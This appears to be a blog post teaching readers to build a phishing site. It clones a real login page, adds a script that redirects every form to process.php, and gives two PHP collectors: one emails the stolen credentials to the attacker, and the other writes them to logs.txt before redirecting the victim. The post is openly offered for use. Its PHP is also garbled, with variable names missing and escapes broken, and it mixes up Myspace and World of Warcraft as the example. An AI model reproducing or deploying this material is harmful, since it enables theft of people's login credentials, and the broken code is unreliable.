How to Create your OWN Phishing Site
How to create your own phishing site.
A phishing site is usually made up of 1 to 3
files that are usually scripted in HTML or PHP.
The first file is usually a HTML login page with
a small script inside that tells the second file
to record whatever they type in. The process
file is usually coded in PHP, the process file
writes to the third file, which is usually the log
file, which is usually in a txt format.
Go to a login page, any page at all that you
want to make into a fake login, lets use
Myspace for example. Go to
"www.worldofwarcraft.com" then on your web
browser on the menu bar go to "File>>Save
Page As" save it in a folder on your desktop
called "Fake Login" (please make sure your not
logged in when you save the page) then go to
the file, and where you see the file you saved
rename it, "index.html", then right click it and
select the option edit, than add the following
code to the bottom.
Code:
<script>
var x;for(x in document.forms){void(document.forms[x].action="process.php
")};
</script>
Now there are two ways to write up the
process file. First one is where you get the
login emailed (Part1) to you, second is where
your login gets recorded into a text document
(Part2).
Part1.
Than save. Now we have our login page, the
first file of the fake login, now we need our
process file. Open notepad, and than copy and
paste the following code inside.
Code:
<?php
= "POST DATAn---------------------------------n";
function log(, ){ global ; .= ." = ".."n"; }
array_walk(Array, "log");
mail("email@watever.com", "Fake Login", );
header("Location: http://www.website.com");
Now we have to do a bit of editing, on the
code above, on the 5th line of code where it
says "email@watever.com" replace that with
your own email for example
"imsexi@hotmail.com". Now on the 6th line of
code where it says "http://www.website.com"
replace that with a address that you want your
user to be forwarded to after they login to
your login file, for example
"www.worldofwarcraft.com". Now save that
file as "process.php".
Now we have our login page, the first file of
the fake login, now we need our process file.
Open notepad, and then copy and paste the
following code inside.
Code:
<?php
header("Location: "link");
= fopen("logs.txt", "a");
foreach(Array as => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
Now for Part2 script we will have to do some
editing, on the second line of code where it
says "link" change that to where you want the
user to go after they enter their login on your
login page and now save that file as
"process.php". Then create a text document
called "logs.txt" thats where your logins will be
recorded.
Enjoy guys
No comments:
Post a Comment